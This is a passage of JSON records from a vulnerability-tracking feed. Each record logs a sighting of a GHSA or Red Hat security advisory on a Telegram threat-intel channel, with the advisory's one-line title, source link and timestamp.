"2023-12-23T11:41:47.000000Z"}, {"uuid": "0fd87d6a-4da1-4e9b-abf0-99ef869cec35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H56G-GQ9V-VC8R", "type": "seen", "source": "https://t.me/ctinow/158781", "content": "https://ift.tt/cvw04V3\nCVE-2023-49080 | Jupyter Server 2.11.2 API information exposure (GHSA-h56g-gq9v-vc8r)", "creation_timestamp": "2023-12-23T11:41:48.000000Z"}, {"uuid": "aca8ee95-b68a-461a-b7e5-7c8c272252a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2J9R-PM96-WP4F", "type": "seen", "source": "https://t.me/ctinow/158779", "content": "https://ift.tt/Xg2iU5V\nCVE-2023-49284 | fish-shell up to 3.6.2 interpretation conflict (GHSA-2j9r-pm96-wp4f)", "creation_timestamp": "2023-12-23T11:41:46.000000Z"}, {"uuid": "e172ec8c-0a32-4bf9-8a91-206f01404c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJ86-P74R-7WP5", "type": "seen", "source": "https://t.me/ctinow/166661", "content": "https://ift.tt/3TIXZit\nCVE-2023-50723 | XWiki Platform Administration Interface neutralization of directives (GHSA-qj86-p74r-7wp5)", "creation_timestamp": "2024-01-11T17:37:04.000000Z"}, {"uuid": "03e8d576-dbc5-4bbb-9fba-80ced8e34017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ62-62C9-22MG", "type": "seen", "source": "https://t.me/ctinow/166648", "content": "https://ift.tt/9D3clPZ\n[GHSA-xq62-62c9-22mg] Drupal Improper Access Control", "creation_timestamp": "2024-01-11T17:07:48.000000Z"}, {"uuid": "9e3c9f5f-fc86-41ba-a0c0-7ca38eb7b859", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JH3-6JHV-2MGP", "type": "seen", "source": "https://t.me/ctinow/165343", "content": "https://ift.tt/gwdTWJ2\n[GHSA-4jh3-6jhv-2mgp] react-native-mmkv Insertion of Sensitive Information into Log File vulnerability", "creation_timestamp": "2024-01-09T20:46:26.000000Z"}, {"uuid": "88f30f68-c97f-4948-a3a2-8af67225b311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GWH-R76W-934H", "type": "seen", "source": "https://t.me/ctinow/165341", "content": "https://ift.tt/Lds7YSw\n[GHSA-5gwh-r76w-934h] Qualys Jenkins Plugin for WAS XML External Entity vulnerability", "creation_timestamp": "2024-01-09T20:31:51.000000Z"}, {"uuid": "05f8b81c-c4c6-4acc-bea0-1d80001c9cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8QP8-9RPW-J46C", "type": "seen", "source": "https://t.me/ctinow/162841", "content": "https://ift.tt/cabWSHp\nCVE-2023-49274 | Umbraco CMS up to 8.18.9 Reset Password information disclosure (GHSA-8qp8-9rpw-j46c)", "creation_timestamp": "2024-01-04T08:41:40.000000Z"}, {"uuid": "bbb44b0a-dd71-40c9-b05d-ff7e222fb6cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6324-52PR-H4P5", "type": "seen", "source": "https://t.me/ctinow/162840", "content": "https://ift.tt/tBahzRU\nCVE-2023-49089 | Umbraco CMS up to 8.18.9/10.8.0/12.2.x path traversal (GHSA-6324-52pr-h4p5)", "creation_timestamp": "2024-01-04T08:41:39.000000Z"}, {"uuid": "8df74316-d4eb-49b2-af41-64842bcfa8c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0002", "type": "seen", "source": "https://t.me/ctinow/161908", "content": "https://ift.tt/9cspfho\nRHSA-2024:0002: Important: thunderbird security update", "creation_timestamp": "2024-01-02T17:17:44.000000Z"}, {"uuid": "eba4d8d2-613c-44ae-9855-95f1ce5d72a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWFR-8PQ7-X9QV", "type": "seen", "source": "https://t.me/ctinow/166681", "content": "https://ift.tt/eEa9sjI\nCVE-2023-50728 | octokit webhooks.js prior 9.26.3/10.9.2/11.1.2/12.0.4 exceptional condition (GHSA-pwfr-8pq7-x9qv)", "creation_timestamp": "2024-01-11T18:02:27.000000Z"}, {"uuid": "7ca94ae4-c5ff-471e-b474-3ac685df73a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7XG2-83F8-39MR", "type": "seen", "source": "https://t.me/ctinow/162583", "content": "https://ift.tt/xjh4yuV\n[GHSA-7xg2-83f8-39mr] The DES/3DES cipher was used as part of the TLS protocol by installation tools", "creation_timestamp": "2024-01-03T21:11:47.000000Z"}, {"uuid": "47e3d6cc-a2c1-44de-94b9-71a4f090c454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4RRV-8GCP-24V8", "type": "seen", "source": "https://t.me/ctinow/162580", "content": "https://ift.tt/LYKW450\n[GHSA-4rrv-8gcp-24v8] PaddlePaddle stack overflow in paddle.searchsorted", "creation_timestamp": "2024-01-03T21:01:42.000000Z"}, {"uuid": "de8afd14-cebc-4f43-8286-1ca2dc4117e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5HF-M3R2-XQ53", "type": "seen", "source": "https://t.me/ctinow/162499", "content": "https://ift.tt/8hjibJD\n[GHSA-m5hf-m3r2-xq53] hutool-core was discovered to contain a stack overflow via NumberUtil.toBigDecimal method", "creation_timestamp": "2024-01-03T17:36:38.000000Z"}, {"uuid": "7c51ec8f-3079-4b56-a4ff-de5fc9cef690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WGQ4-4CFG-C4X3", "type": "seen", "source": "https://t.me/ctinow/166389", "content": "https://ift.tt/rokvIsS\nCVE-2023-50269 | Squid Web Proxy up to 2.7.STABLE9/5.9/6.5 HTTP Request Parser X-Forwarded-For recursion (GHSA-wgq4-4cfg-c4x3)", "creation_timestamp": "2024-01-11T09:26:16.000000Z"}, {"uuid": "4f36a429-bdbc-4889-8109-b5731c0a3de8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJHC-6XM7-MC8Q", "type": "seen", "source": "https://t.me/ctinow/162628", "content": "https://ift.tt/qIR4Ux5\n[GHSA-gjhc-6xm7-mc8q] Duplicate Advisory: Cross-site scripting vulnerability in TinyMCE", "creation_timestamp": "2024-01-03T22:36:56.000000Z"}, {"uuid": "0a3330a9-2377-40fc-8649-d4d9f08d4849", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5PP-5Q2H-G8RV", "type": "seen", "source": "https://t.me/ctinow/162627", "content": "https://ift.tt/MpCw7R3\n[GHSA-q5pp-5q2h-g8rv] Duplicate Advisory: Cross-site scripting vulnerability in TinyMCE", "creation_timestamp": "2024-01-03T22:36:55.000000Z"}, {"uuid": "b3fcaf2a-a3b8-401e-8a90-3a75378fc38c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WXJ2-777F-VXMF", "type": "seen", "source": "https://t.me/ctinow/162626", "content": "https://ift.tt/rV8YZqu\n[GHSA-wxj2-777f-vxmf] Duplicate Advisory: Cross-site scripting vulnerability in TinyMCE plugins", "creation_timestamp": "2024-01-03T22:36:53.000000Z"}, {"uuid": "f028fbfc-617f-445d-9754-77bb89b230ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9V7-WMWJ-VF6X", "type": "seen", "source": "https://t.me/ctinow/162625", "content": "https://ift.tt/Mx7pHBS\n[GHSA-c9v7-wmwj-vf6x] SFTP is possible on the Proxy server for any user with SFTP access", "creation_timestamp": "2024-01-03T22:36:52.000000Z"}, {"uuid": "035dd3d3-414c-4338-bf21-a42a81bcd2ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-76CC-P55W-63G3", "type": "seen", "source": "https://t.me/ctinow/162624", "content": "https://ift.tt/5W9iNuG\n[GHSA-76cc-p55w-63g3] Teleport Access List owners can escalate their privileges", "creation_timestamp": "2024-01-03T22:36:51.000000Z"}, {"uuid": "4545e556-978c-40a0-b8a7-fb7c08a02be4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HW4X-MCX5-9Q36", "type": "seen", "source": "https://t.me/ctinow/162623", "content": "https://ift.tt/83WHxOA\n[GHSA-hw4x-mcx5-9q36] Teleport Proxy and Teleport Agents: SSRF to arbitrary hosts is possible from low privileged users", "creation_timestamp": "2024-01-03T22:36:50.000000Z"}, {"uuid": "f7c445f9-3e6c-4ff2-9f55-8c7610e6dc09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HF3R-VMRV-7W29", "type": "seen", "source": "https://t.me/ctinow/162617", "content": "https://ift.tt/vsGU6O9\n[GHSA-hf3r-vmrv-7w29] Duplicate Advisory: Denial of service in CBOR library", "creation_timestamp": "2024-01-03T22:27:00.000000Z"}, {"uuid": "d0cad1e0-3113-4349-86ec-0b96df185ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8RFX-6MR3-5JH3", "type": "seen", "source": "https://t.me/ctinow/162585", "content": "https://ift.tt/KFSro4T\n[GHSA-8rfx-6mr3-5jh3] Duplicate Advisory: Improper Handling of Exceptional Conditions in Newtonsoft.Json", "creation_timestamp": "2024-01-03T21:11:49.000000Z"}, {"uuid": "a5fa9d41-1162-428a-8aec-7fe8777fe545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJPW-HX47-RCCV", "type": "seen", "source": "https://t.me/ctinow/162584", "content": "https://ift.tt/uDl1nRi\n[GHSA-xjpw-hx47-rccv] PaddlePaddle floating point exception in paddle.nanmedian", "creation_timestamp": "2024-01-03T21:11:48.000000Z"}, {"uuid": "3d99f21e-c7e5-4d1a-9de2-b3fe99108ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8579-7P32-F398", "type": "seen", "source": "https://t.me/ctinow/162467", "content": "https://ift.tt/u9WlgyU\n[GHSA-8579-7p32-f398] CubeFS timing attack can leak user passwords", "creation_timestamp": "2024-01-03T17:26:43.000000Z"}, {"uuid": "d0dfd671-ce50-4961-8e18-390d35322f02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4248-P65P-HCRM", "type": "seen", "source": "https://t.me/ctinow/162468", "content": "https://ift.tt/mtxJPEX\n[GHSA-4248-p65p-hcrm] Insecure random string generator used for sensitive data", "creation_timestamp": "2024-01-03T17:26:44.000000Z"}, {"uuid": "0acf9f84-9e9c-428b-b7af-19d98334191a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QC6V-G3XW-GRMX", "type": "seen", "source": "https://t.me/ctinow/162466", "content": "https://ift.tt/fkb5Siy\n[GHSA-qc6v-g3xw-grmx] Authenticated users can crash the CubeFS servers with maliciously crafted requests", "creation_timestamp": "2024-01-03T17:26:41.000000Z"}, {"uuid": "5ec091c3-c8cc-43f3-bce9-9e60c9e0a8a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0013", "type": "seen", "source": "https://t.me/ctinow/161905", "content": "https://ift.tt/H792Yiq\nRHSA-2024:0013: Important: gstreamer1-plugins-bad-free security update", "creation_timestamp": "2024-01-02T17:17:40.000000Z"}, {"uuid": "ccb6b4bf-334d-4816-b2e2-ae41cb66ed83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0014", "type": "seen", "source": "https://t.me/ctinow/161904", "content": "https://ift.tt/cMiboQN\nRHSA-2024:0014: Important: tigervnc security update", "creation_timestamp": "2024-01-02T17:17:39.000000Z"}, {"uuid": "1400bf00-adea-47aa-b71c-5b805cb0f6e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0016", "type": "seen", "source": "https://t.me/ctinow/161903", "content": "https://ift.tt/9Zm2RgS\nRHSA-2024:0016: Important: tigervnc security update", "creation_timestamp": "2024-01-02T17:17:38.000000Z"}, {"uuid": "6cb75f83-cb12-4614-aa7f-1c14a4153b9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0018", "type": "seen", "source": "https://t.me/ctinow/161902", "content": "https://ift.tt/zRUP7of\nRHSA-2024:0018: Important: tigervnc security update", "creation_timestamp": "2024-01-02T17:17:37.000000Z"}, {"uuid": "c7a78613-c083-41fc-b26e-c63360598d74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0021", "type": "seen", "source": "https://t.me/ctinow/161901", "content": "https://ift.tt/79zg6do\nRHSA-2024:0021: Important: firefox security update", "creation_timestamp": "2024-01-02T17:17:36.000000Z"}, {"uuid": "4ed261a7-ab47-49a2-aacc-810b284b64e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0029", "type": "seen", "source": "https://t.me/ctinow/161897", "content": "https://ift.tt/3G0ULZd\nRHSA-2024:0029: Important: thunderbird security update", "creation_timestamp": "2024-01-02T17:17:31.000000Z"}, {"uuid": "d40ef590-8508-45a2-82c8-762da03a66e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9654-PR4F-GH6M", "type": "seen", "source": "https://t.me/ctinow/161812", "content": "https://ift.tt/xUFbuXq\nCVE-2023-28465 | FHIR Core Libraries prior 5.6.106 on CVE package-decompression path traversal (GHSA-9654-pr4f-gh6m)", "creation_timestamp": "2024-01-02T15:06:54.000000Z"}, {"uuid": "c06927c6-9ff5-47c9-a82d-2cb1f53802b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7855", "type": "seen", "source": "https://t.me/ctinow/161894", "content": "https://ift.tt/nKLpOMQ\nRHSA-2023:7855: Important: Red Hat Single Sign-On 7.6.6 security update on RHEL 9", "creation_timestamp": "2024-01-02T17:17:27.000000Z"}, {"uuid": "bf1e9d18-83f8-4be3-a1d9-6de4f62e53e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7856", "type": "seen", "source": "https://t.me/ctinow/161893", "content": "https://ift.tt/xpaySHs\nRHSA-2023:7856: Important: Red Hat Single Sign-On 7.6.6 security update on RHEL 8", "creation_timestamp": "2024-01-02T17:17:25.000000Z"}, {"uuid": "388f7292-d666-444d-bf6b-8175988f3432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M2RX-243P-9W64", "type": "seen", "source": "https://t.me/ctinow/158777", "content": "https://ift.tt/q7jX0Ym\nCVE-2023-48692 | azure-rtos netxduo up to 6.2.1 icmp/tcp/snmp/dhcp/nat/ftp expired pointer dereference (GHSA-m2rx-243p-9w64)", "creation_timestamp": "2023-12-23T11:41:43.000000Z"}, {"uuid": "1274122c-897f-4f71-b7ec-e326dad25c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0137", "type": "seen", "source": "https://t.me/ctinow/165799", "content": "https://ift.tt/z6LVJxG\nRHSA-2024:0137: Moderate: idm:DL1 security update", "creation_timestamp": "2024-01-10T14:16:26.000000Z"}, {"uuid": "3789703a-9475-490b-aa1d-0dc8a9dbde71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0138", "type": "seen", "source": "https://t.me/ctinow/165798", "content": "https://ift.tt/7Nkiprs\nRHSA-2024:0138: Moderate: idm:DL1 security update", "creation_timestamp": "2024-01-10T14:16:25.000000Z"}, {"uuid": "55ce66d6-635a-417f-8479-c3110bbfe182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0139", "type": "seen", "source": "https://t.me/ctinow/165797", "content": "https://ift.tt/NKQfGhz\nRHSA-2024:0139: Moderate: idm:DL1 security update", "creation_timestamp": "2024-01-10T14:16:24.000000Z"}, {"uuid": "eb468d94-0529-4486-8d3e-8ac8d125b34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0140", "type": "seen", "source": "https://t.me/ctinow/165796", "content": "https://ift.tt/HInhcVA\nRHSA-2024:0140: Moderate: ipa security update", "creation_timestamp": "2024-01-10T14:16:23.000000Z"}, {"uuid": "5cfec6e0-aaa1-40a4-82a3-589c701b9e32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0142", "type": "seen", "source": "https://t.me/ctinow/165795", "content": "https://ift.tt/DATHlca\nRHSA-2024:0142: Moderate: ipa security update", "creation_timestamp": "2024-01-10T14:16:22.000000Z"}, {"uuid": "40c0bfc3-b634-48da-86ed-dc9401f7b00c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PVCR-V8J8-J5Q3", "type": "seen", "source": "https://t.me/ctinow/165150", "content": "https://ift.tt/nCUAps3\n[GHSA-pvcr-v8j8-j5q3] Parsing JSON serialized payload without protected field can lead to segfault", "creation_timestamp": "2024-01-09T17:26:56.000000Z"}, {"uuid": "ef5d94d0-91da-4d67-a9d4-d755225028e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6673-4983-2VX5", "type": "seen", "source": "https://t.me/ctinow/165142", "content": "https://ift.tt/OZ0wTeM\n[GHSA-6673-4983-2vx5] fonttools XML External Entity Injection (XXE) Vulnerability", "creation_timestamp": "2024-01-09T17:17:28.000000Z"}, {"uuid": "c4c665e9-638a-4691-b389-95f07cd6531c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8M5F-2XVP-2C8W", "type": "seen", "source": "https://t.me/ctinow/167565", "content": "https://ift.tt/EpnNoqX\n[GHSA-8m5f-2xvp-2c8w] WWBN AVideo recovery notification bypass vulnerability", "creation_timestamp": "2024-01-12T22:37:06.000000Z"}, {"uuid": "8ec8a6a5-67c2-46f8-9017-03ba19edd668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q6W5-JG5Q-47VG", "type": "seen", "source": "https://t.me/ctinow/167555", "content": "https://ift.tt/sve2qx8\n[GHSA-q6w5-jg5q-47vg] @clerk/nextjs auth() and getAuth() methods vulnerable to insecure direct object reference (IDOR)", "creation_timestamp": "2024-01-12T22:21:57.000000Z"}, {"uuid": "cdb7b6bf-6497-4659-bf62-ad7540a11745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHCR-X7HC-8FP8", "type": "seen", "source": "https://t.me/ctinow/167360", "content": "https://ift.tt/TlUMI89\n[GHSA-chcr-x7hc-8fp8] Devise-Two-Factor vulnerable to brute force attacks", "creation_timestamp": "2024-01-12T16:27:16.000000Z"}, {"uuid": "f06a2df1-96d1-4ef5-94bb-405a09639a4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9W2P-RH8C-V9G5", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/161218", "content": "https://ift.tt/WqXUeL8\nCVE-2023-49797 | pyinstaller up to 5.13.0 Temporary Directory shutil.rmtree permission assignment (GHSA-9w2p-rh8c-v9g5)", "creation_timestamp": "2024-01-01T07:56:39.000000Z"}, {"uuid": "4424906c-292e-473d-90b2-ab57ead4ae63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7612", "type": "seen", "source": "https://t.me/ctinow/161215", "content": "https://ift.tt/f9dcrRH\nCVE-2023-6394 | Red Hat Quarkus prior 3.6.0 Websocket incorrect behavior order (RHSA-2023:7612)", "creation_timestamp": "2024-01-01T07:56:35.000000Z"}, {"uuid": "880aab53-5274-42ef-a992-ed0358b9b83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5FPQ-3C9P-3R3W", "type": "seen", "source": "https://t.me/ctinow/162017", "content": "https://ift.tt/vNkHSch\n[GHSA-5fpq-3c9p-3r3w] ShifuML shifu code injection vulnerability", "creation_timestamp": "2024-01-02T21:16:31.000000Z"}, {"uuid": "028b142c-958f-4844-b8ec-5837e7bd0661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X6F-956F-Q43W", "type": "seen", "source": "https://t.me/ctinow/161923", "content": "https://ift.tt/EmpghL6\n[GHSA-8x6f-956f-q43w] OWASP.AntiSamy mXSS when preserving comments", "creation_timestamp": "2024-01-02T17:46:41.000000Z"}, {"uuid": "578e6872-2776-4eb0-a1fe-3f5629a1ee93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-875G-MFP6-G7F9", "type": "seen", "source": "https://t.me/ctinow/161918", "content": "https://ift.tt/nGJs5NL\n[GHSA-875g-mfp6-g7f9] `serde` deserialization for `FamStructWrapper` lacks bound checks that could potentially lead to out-of-bounds memory access", "creation_timestamp": "2024-01-02T17:36:47.000000Z"}, {"uuid": "a6435dcb-b84f-4a05-9dea-d38ee4988d77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0023", "type": "seen", "source": "https://t.me/ctinow/161900", "content": "https://ift.tt/eXYmBuA\nRHSA-2024:0023: Important: firefox security update", "creation_timestamp": "2024-01-02T17:17:35.000000Z"}, {"uuid": "7c739a47-41e6-474b-b712-18d1af2482bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0024", "type": "seen", "source": "https://t.me/ctinow/161899", "content": "https://ift.tt/9NgZUhQ\nRHSA-2024:0024: Important: firefox security update", "creation_timestamp": "2024-01-02T17:17:33.000000Z"}, {"uuid": "16f570a1-74d9-4959-9b5d-0356cfa50d82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0027", "type": "seen", "source": "https://t.me/ctinow/161898", "content": "https://ift.tt/Y8yzBUI\nRHSA-2024:0027: Important: thunderbird security update", "creation_timestamp": "2024-01-02T17:17:32.000000Z"}, {"uuid": "d574319d-9a9e-4e7d-aca7-0d7af19c3a9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0030", "type": "seen", "source": "https://t.me/ctinow/161896", "content": "https://ift.tt/HuT6sfa\nRHSA-2024:0030: Important: thunderbird security update", "creation_timestamp": "2024-01-02T17:17:30.000000Z"}, {"uuid": "c95e5396-5552-4abd-9b14-037646fd257a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7884", "type": "seen", "source": "https://t.me/ctinow/161895", "content": "https://ift.tt/gjR1CKY\nRHSA-2023:7884: Important: postgresql:15 security update", "creation_timestamp": "2024-01-02T17:17:28.000000Z"}, {"uuid": "4bc9625f-bcb7-4de4-bc42-e999f334046a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJ22-23FF-2HRR", "type": "seen", "source": "https://t.me/ctinow/161329", "content": "https://ift.tt/7AXugrj\nCVE-2023-49805 | louislam uptime-kuma up to 1.23.8 environment missing origin validation in websockets (GHSA-mj22-23ff-2hrr)", "creation_timestamp": "2024-01-01T15:07:01.000000Z"}, {"uuid": "bc71498a-b787-459c-bf03-680338efec45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59C9-PXQ8-9C73", "type": "seen", "source": "https://t.me/ctinow/161382", "content": "https://ift.tt/qBkI4AM\nCVE-2023-50424 | SAP cloud-security-client-go up to 0.16.x authorization (GHSA-59c9-pxq8-9c73)", "creation_timestamp": "2024-01-01T17:07:17.000000Z"}, {"uuid": "0b88da35-203e-415d-92fd-41b6a7ba406a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-699G-Q6QH-Q4V8", "type": "seen", "source": "https://t.me/ctinow/161236", "content": "https://ift.tt/NtvPRhi\nCVE-2023-49798 | OpenZeppelin openzeppelin-contracts 4.9.4 Subcall control flow (GHSA-699g-q6qh-q4v8)", "creation_timestamp": "2024-01-01T08:56:57.000000Z"}, {"uuid": "4ca792bd-17a8-4663-8abe-6afd8b85bf15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7787-P7X6-FQ3J", "type": "seen", "source": "https://t.me/ctinow/161086", "content": "https://ift.tt/4hZHLr8\nCVE-2023-6245 | Internet Computer Candid up to 0.9.9 inconsistent special elements (GHSA-7787-p7x6-fq3j)", "creation_timestamp": "2023-12-31T14:11:18.000000Z"}, {"uuid": "d1330d6e-2e73-4e63-9f45-26d13d3b2730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 